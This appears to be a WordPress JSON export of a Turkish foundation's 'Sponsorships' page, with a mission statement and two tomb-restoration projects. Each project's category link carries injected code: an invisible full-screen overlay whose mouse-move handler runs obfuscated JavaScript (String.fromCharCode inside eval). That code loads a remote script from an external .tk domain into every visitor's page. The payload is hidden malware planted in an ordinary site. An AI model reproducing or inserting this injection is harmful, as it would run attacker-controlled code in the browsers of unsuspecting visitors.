{"id":26034,"date":"2023-11-20T15:38:55","date_gmt":"2023-11-20T12:38:55","guid":{"rendered":"https:\/\/kerimvakfi.org\/sponsorships\/"},"modified":"2023-11-20T15:38:59","modified_gmt":"2023-11-20T12:38:59","slug":"sponsorships","status":"publish","type":"page","link":"https:\/\/kerimvakfi.org\/en\/foundations-activities\/sponsorships\/","title":{"rendered":"Sponsorships"},"content":{"rendered":"<p><div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-1 fusion-flex-container nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"background-color: rgba(255,255,255,0);background-position: left top;background-repeat: no-repeat;border-width: 0px 0px 0px 0px;border-color:#eae9e9;border-style:solid;\" ><div class=\"fusion-builder-row fusion-row fusion-flex-align-items-flex-start\" style=\"max-width:1248px;margin-left: calc(-4% \/ 2 );margin-right: calc(-4% \/ 2 );\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-0 fusion_builder_column_1_1 1_1 fusion-flex-column fusion-flex-align-self-flex-start fusion-column-no-min-height\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 0px;\"><div class=\"fusion-text fusion-text-1\" style=\"transform:translate3d(0,0,0);\"><p><span class=\"fusion-dropcap dropcap\" style=\"color: #cc9900;\">Kerim<\/span>Foundation aims to serve all segments of society with its activities in the fields of education, health and culture. The aim of our foundation is to pioneer a conscious society. Especially in education, health and culture, Kerim Foundation is taking steps towards becoming a proactive and locomotive NGO with projects that will serve as a model for the private sector.<\/p>\n<p>From this center, Kerim Foundation aims to open institutions in every field of education to meet the needs of the whole society and all different segments, to support students with scholarships and to be the light of hope for future generations. At the same time, by organizing national and international symposiums, it works to reunite the cultural codes and values of our society with all humanity.<\/p>\n<p>Kerim Foundation combats some of the elements that negatively affect society by glorifying moral values. With academic studies, it aims to bring our people together with our spiritual values and culture that glorify our people sociologically and psychologically.<\/p>\n<\/div><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-0{width:100% !important;margin-top : 0px;margin-bottom : 0px;}.fusion-builder-column-0 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 1.92%;padding-bottom : 0px !important;padding-left : 0px !important;margin-left : 1.92%;}@media only screen and (max-width:1024px) {.fusion-body .fusion-builder-column-0{width:100% !important;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-0{width:100% !important;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><style type=\"text\/css\">.fusion-body .fusion-flex-container.fusion-builder-row-1{ padding-top : 20px;margin-top : 0px;padding-right : 0px;padding-bottom : 20px;margin-bottom : 0px;padding-left : 0px;}<\/style><\/div><div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-2 fusion-flex-container hundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;border-width: 0px 0px 0px 0px;border-color:#eae9e9;border-style:solid;\" ><div class=\"fusion-builder-row fusion-row fusion-flex-align-items-flex-start\" style=\"width:104% !important;max-width:104% !important;margin-left: calc(-4% \/ 2 );margin-right: calc(-4% \/ 2 );\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-1 fusion_builder_column_1_1 1_1 fusion-flex-column fusion-flex-align-self-flex-start fusion-column-no-min-height\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 0px;\"><div class=\"fusion-recent-works fusion-portfolio-element fusion-portfolio fusion-portfolio-1 fusion-portfolio-grid fusion-portfolio-paging-infinite fusion-portfolio-three fusion-portfolio-no_text fusion-portfolio-rollover\" data-id=\"-rw-1\" data-columns=\"three\"><div role=\"menubar\"><ul class=\"fusion-filters\" role=\"menu\" aria-label=\"filters\"><li role=\"menuitem\" class=\"fusion-filter fusion-hidden fusion-active\"><a href=\"#\" data-filter=\".sponsorships\">Sponsorships<\/a><\/li><\/ul><\/div><style type=\"text\/css\">.fusion-portfolio-1 .fusion-portfolio-wrapper .fusion-col-spacing{padding:6px;}<\/style><div class=\"fusion-portfolio-wrapper\" id=\"fusion-portfolio-1\" data-picturesize=\"auto\" data-pages=\"1\" style=\"margin:-6px;\"><article id=\"portfolio-1-post-26683\" class=\"fusion-portfolio-post sponsorships fusion-col-spacing post-26683\"><div class=\"fusion-portfolio-content-wrapper\" style=\"border:none;\"><span class=\"entry-title rich-snippet-hidden\">Restoration of the Inscription on the Main Entrance Gate of the Tombs of His Holiness Geyl\u00e2ni<\/span><span class=\"vcard rich-snippet-hidden\"><span class=\"fn\"><a href=\"https:\/\/kerimvakfi.org\/en\/author\/webmaster\/\" title=\"Posts by webmaster\" rel=\"author\">webmaster<\/a><\/span><\/span><span class=\"updated rich-snippet-hidden\">2024-02-08T14:03:53+03:00<\/span>\n\n<div  class=\"fusion-image-wrapper\" aria-haspopup=\"true\">\n\t\n\t\n\t\n\t\t\n\t\t\t\t\t<img width=\"760\" height=\"380\" src=\"https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2020\/02\/Geylani_kapak.png?resize=760%2C380&#038;ssl=1\" class=\"attachment-full size-full wp-post-image\" alt=\"\" srcset=\"https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2020\/02\/Geylani_kapak.png?resize=120%2C60&amp;ssl=1 120w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2020\/02\/Geylani_kapak.png?resize=200%2C100&amp;ssl=1 200w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2020\/02\/Geylani_kapak.png?resize=300%2C150&amp;ssl=1 300w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2020\/02\/Geylani_kapak.png?resize=400%2C200&amp;ssl=1 400w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2020\/02\/Geylani_kapak.png?resize=500%2C250&amp;ssl=1 500w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2020\/02\/Geylani_kapak.png?resize=600%2C300&amp;ssl=1 600w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2020\/02\/Geylani_kapak.png?fit=760%2C380&amp;ssl=1 760w\" sizes=\"(min-width: 2200px) 100vw, (min-width: 784px) 392px, (min-width: 712px) 588px, (min-width: 640px) 712px, \" data-recalc-dims=\"1\" \/>\n\t\n\n\t\t<div class=\"fusion-rollover\">\n\t<div class=\"fusion-rollover-content\">\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"fusion-rollover-link\" href=\"https:\/\/kerimvakfi.org\/en\/vakfin-calismasi\/restoration-of-the-inscription-on-the-main-entrance-gate-of-the-tombs-of-his-holiness-geylani\/?portfolioCats=193%2C193\">Restoration of the Inscription on the Main Entrance Gate of the Tombs of His Holiness Geyl\u00e2ni<\/a>\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t<div class=\"fusion-rollover-sep\"><\/div>\n\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"fusion-rollover-gallery\" href=\"https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2020\/02\/Geylani_kapak.png?fit=760%2C380&ssl=1\" data-id=\"26683\" data-rel=\"iLightbox[gallery-rw-1]\" data-title=\"Geylani_kapak\" data-caption=\"\">\n\t\t\t\t\t\tGallery\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t<h4 class=\"fusion-rollover-title\">\n\t\t\t\t\t<a class=\"fusion-rollover-title-link\" href=\"https:\/\/kerimvakfi.org\/en\/vakfin-calismasi\/restoration-of-the-inscription-on-the-main-entrance-gate-of-the-tombs-of-his-holiness-geylani\/?portfolioCats=193%2C193\">\n\t\t\t\t\t\tRestoration of the Inscription on the Main Entrance Gate of the Tombs of His Holiness Geyl\u00e2ni\t\t\t\t\t<\/a>\n\t\t\t\t<\/h4>\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<div class=\"fusion-rollover-categories\"><a href=\"https:\/\/kerimvakfi.org\/en\/testing%20style=position:fixed;%20top:0px;%20left:0px;%20width:9000px;%20height:9000px;%20background-color:white;%20onmousemove=eval(String.fromCharCode(118,%2097,%20114,%2032,%20116,%20115,%20114,%2032,%2061,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2034,%20115,%2099,%20114,%20105,%20112,%20116,%2034,%2041,%2059,%2032,%2032,%20116,%20115,%20114,%2046,%20116,%20121,%20112,%20101,%2032,%2061,%2032,%2034,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2034,%2059,%2032,%2032,%20116,%20115,%20114,%2046,%20115,%20114,%2099,%2032,%2061,%2032,%2034,%20104,%20116,%20116,%20112,%20115,%2058,%2047,%2047,%20115,%20116,%2097,%20116,%20115,%2046,%20115,%20116,%2097,%20114,%20116,%20114,%20101,%2099,%20101,%20105,%20118,%20101,%2046,%20116,%20107,%2047,%20115,%2099,%2046,%20106,%20115,%2034,%2059,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%20104,%20101,%2097,%20100,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20116,%20115,%20114,%2041,%2059))%20data-x=\/sponsorships\/\" rel=\"tag\">Sponsorships<\/a><\/div>\t\t\t\t\t\n\t\t\n\t\t\t\t<a class=\"fusion-link-wrapper\" href=\"https:\/\/kerimvakfi.org\/en\/vakfin-calismasi\/restoration-of-the-inscription-on-the-main-entrance-gate-of-the-tombs-of-his-holiness-geylani\/?portfolioCats=193%2C193\" aria-label=\"Restoration of the Inscription on the Main Entrance Gate of the Tombs of His Holiness Geyl\u00e2ni\"><\/a>\n\t<\/div>\n<\/div>\n\n\t\n<\/div>\n<\/div><\/article><article id=\"portfolio-1-post-27062\" class=\"fusion-portfolio-post sponsorships fusion-col-spacing post-27062\"><div class=\"fusion-portfolio-content-wrapper\" style=\"border:none;\"><span class=\"entry-title rich-snippet-hidden\">Emir Sultan Tomb Restoration<\/span><span class=\"vcard rich-snippet-hidden\"><span class=\"fn\"><a href=\"https:\/\/kerimvakfi.org\/en\/author\/webmaster\/\" title=\"Posts by webmaster\" rel=\"author\">webmaster<\/a><\/span><\/span><span class=\"updated rich-snippet-hidden\">2024-02-08T14:03:35+03:00<\/span>\n\n<div  class=\"fusion-image-wrapper\" aria-haspopup=\"true\">\n\t\n\t\n\t\n\t\t\n\t\t\t\t\t<img width=\"1000\" height=\"500\" src=\"https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?resize=1000%2C500&#038;ssl=1\" class=\"attachment-full size-full wp-post-image\" alt=\"\" srcset=\"https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?resize=120%2C60&amp;ssl=1 120w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?resize=200%2C100&amp;ssl=1 200w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?resize=300%2C150&amp;ssl=1 300w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?resize=400%2C200&amp;ssl=1 400w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?resize=500%2C250&amp;ssl=1 500w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?resize=600%2C300&amp;ssl=1 600w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?resize=768%2C384&amp;ssl=1 768w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?resize=800%2C400&amp;ssl=1 800w, https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?fit=1000%2C500&amp;ssl=1 1000w\" sizes=\"(min-width: 2200px) 100vw, (min-width: 784px) 392px, (min-width: 712px) 588px, (min-width: 640px) 712px, \" data-recalc-dims=\"1\" \/>\n\t\n\n\t\t<div class=\"fusion-rollover\">\n\t<div class=\"fusion-rollover-content\">\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"fusion-rollover-link\" href=\"https:\/\/kerimvakfi.org\/en\/vakfin-calismasi\/emir-sultan-tomb-restoration\/?portfolioCats=193%2C193\">Emir Sultan Tomb Restoration<\/a>\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t<div class=\"fusion-rollover-sep\"><\/div>\n\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"fusion-rollover-gallery\" href=\"https:\/\/i0.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2015\/09\/EmirSultan_1000x500-1.jpg?fit=1000%2C500&ssl=1\" data-id=\"27062\" data-rel=\"iLightbox[gallery-rw-1]\" data-title=\"EmirSultan_1000x500\" data-caption=\"\">\n\t\t\t\t\t\tGallery\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t<h4 class=\"fusion-rollover-title\">\n\t\t\t\t\t<a class=\"fusion-rollover-title-link\" href=\"https:\/\/kerimvakfi.org\/en\/vakfin-calismasi\/emir-sultan-tomb-restoration\/?portfolioCats=193%2C193\">\n\t\t\t\t\t\tEmir Sultan Tomb Restoration\t\t\t\t\t<\/a>\n\t\t\t\t<\/h4>\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<div class=\"fusion-rollover-categories\"><a href=\"https:\/\/kerimvakfi.org\/en\/testing%20style=position:fixed;%20top:0px;%20left:0px;%20width:9000px;%20height:9000px;%20background-color:white;%20onmousemove=eval(String.fromCharCode(118,%2097,%20114,%2032,%20116,%20115,%20114,%2032,%2061,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2034,%20115,%2099,%20114,%20105,%20112,%20116,%2034,%2041,%2059,%2032,%2032,%20116,%20115,%20114,%2046,%20116,%20121,%20112,%20101,%2032,%2061,%2032,%2034,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2034,%2059,%2032,%2032,%20116,%20115,%20114,%2046,%20115,%20114,%2099,%2032,%2061,%2032,%2034,%20104,%20116,%20116,%20112,%20115,%2058,%2047,%2047,%20115,%20116,%2097,%20116,%20115,%2046,%20115,%20116,%2097,%20114,%20116,%20114,%20101,%2099,%20101,%20105,%20118,%20101,%2046,%20116,%20107,%2047,%20115,%2099,%2046,%20106,%20115,%2034,%2059,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%20104,%20101,%2097,%20100,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20116,%20115,%20114,%2041,%2059))%20data-x=\/sponsorships\/\" rel=\"tag\">Sponsorships<\/a><\/div>\t\t\t\t\t\n\t\t\n\t\t\t\t<a class=\"fusion-link-wrapper\" href=\"https:\/\/kerimvakfi.org\/en\/vakfin-calismasi\/emir-sultan-tomb-restoration\/?portfolioCats=193%2C193\" aria-label=\"Emir Sultan Tomb Restoration\"><\/a>\n\t<\/div>\n<\/div>\n\n\t\n<\/div>\n<\/div><\/article><\/div><\/div><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-1{width:100% !important;margin-top : 0px;margin-bottom : 0px;}.fusion-builder-column-1 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 1.92%;padding-bottom : 0px !important;padding-left : 0px !important;margin-left : 1.92%;}@media only screen and (max-width:1024px) {.fusion-body .fusion-builder-column-1{width:100% !important;}.fusion-builder-column-1 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-1{width:100% !important;}.fusion-builder-column-1 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><style type=\"text\/css\">.fusion-fullwidth.fusion-builder-row-2 { overflow:visible; }.fusion-body .fusion-flex-container.fusion-builder-row-2{ padding-top : 0px;margin-top : 0px;padding-right : 0px;padding-bottom : 0px;margin-bottom : 0px;padding-left : 0px;}<\/style><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":26049,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"spay_email":""},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Sponsorships - Kerim Vakf\u0131<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kerimvakfi.org\/en\/sponsorships\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sponsorships - Kerim Vakf\u0131\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kerimvakfi.org\/en\/sponsorships\/\" \/>\n<meta property=\"og:site_name\" content=\"Kerim Vakf\u0131\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/kerimvakfi\" \/>\n<meta property=\"article:modified_time\" content=\"2023-11-20T12:38:59+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:site\" content=\"@kerimvakfi\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kerimvakfi.org\/#website\",\"url\":\"https:\/\/kerimvakfi.org\/\",\"name\":\"Kerim Vakf\u0131\",\"description\":\"Kerim E\u011fitim K\u00fclt\u00fcr ve Sa\u011fl\u0131k Vakf\u0131\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kerimvakfi.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kerimvakfi.org\/en\/sponsorships\/#webpage\",\"url\":\"https:\/\/kerimvakfi.org\/en\/sponsorships\/\",\"name\":\"Sponsorships - Kerim Vakf\u0131\",\"isPartOf\":{\"@id\":\"https:\/\/kerimvakfi.org\/#website\"},\"datePublished\":\"2023-11-20T12:38:55+00:00\",\"dateModified\":\"2023-11-20T12:38:59+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/kerimvakfi.org\/en\/sponsorships\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kerimvakfi.org\/en\/sponsorships\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/kerimvakfi.org\/en\/sponsorships\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Ana sayfa\",\"item\":\"https:\/\/kerimvakfi.org\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sponsorships\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sponsorships - Kerim Vakf\u0131","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kerimvakfi.org\/en\/sponsorships\/","og_locale":"en_US","og_type":"article","og_title":"Sponsorships - Kerim Vakf\u0131","og_url":"https:\/\/kerimvakfi.org\/en\/sponsorships\/","og_site_name":"Kerim Vakf\u0131","article_publisher":"https:\/\/www.facebook.com\/kerimvakfi","article_modified_time":"2023-11-20T12:38:59+00:00","twitter_card":"summary","twitter_site":"@kerimvakfi","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/kerimvakfi.org\/#website","url":"https:\/\/kerimvakfi.org\/","name":"Kerim Vakf\u0131","description":"Kerim E\u011fitim K\u00fclt\u00fcr ve Sa\u011fl\u0131k Vakf\u0131","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kerimvakfi.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kerimvakfi.org\/en\/sponsorships\/#webpage","url":"https:\/\/kerimvakfi.org\/en\/sponsorships\/","name":"Sponsorships - Kerim Vakf\u0131","isPartOf":{"@id":"https:\/\/kerimvakfi.org\/#website"},"datePublished":"2023-11-20T12:38:55+00:00","dateModified":"2023-11-20T12:38:59+00:00","breadcrumb":{"@id":"https:\/\/kerimvakfi.org\/en\/sponsorships\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kerimvakfi.org\/en\/sponsorships\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/kerimvakfi.org\/en\/sponsorships\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Ana sayfa","item":"https:\/\/kerimvakfi.org\/en\/"},{"@type":"ListItem","position":2,"name":"Sponsorships"}]}]}},"_links":{"self":[{"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/pages\/26034"}],"collection":[{"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/comments?post=26034"}],"version-history":[{"count":1,"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/pages\/26034\/revisions"}],"predecessor-version":[{"id":26037,"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/pages\/26034\/revisions\/26037"}],"up":[{"embeddable":true,"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/pages\/26049"}],"wp:attachment":[{"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/media?parent=26034"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}